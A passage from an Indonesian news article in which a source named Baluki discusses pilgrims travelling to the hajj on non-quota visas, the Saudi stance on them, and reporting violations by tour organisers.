Selain itu, menurut dia, Pemerintah Saudi sejauh ini juga tidak melarang jamaah yang datang ke Tanah Suci dengan menggunakan visa nonkuota. “Sekarang kalau orang sudah punya visa, imigrasi tidak bisa melarang. Sepanjang akomodasi untuk  jamaah benar, pelaksanaan ibadahnya benar, ya tidak ada masalah. Kalau ada pelanggaran ya ditindak. Tentunya masyarakat juga harus aktif melaporkan jika ada pelanggaran oleh penyelenggara,” tutur Baluki.

Setiap tahun,kata dia,  jamaah haji yang pergi dengan visa hajinonkuota tidak pernah kurang dari 1.000 orang. (m izadine)

Tags : kasus hajimusim hajipenyelenggaraan haji
Ahmad KH Marzuki

The author Ahmad KH Marzuki

Peselancar internet, hobi merenung dan suka membaca apa saja untuk menafkahi gizi akal pikiran dan batin... :)

Leave a Reply

avatar
  Subscribe  
Notify of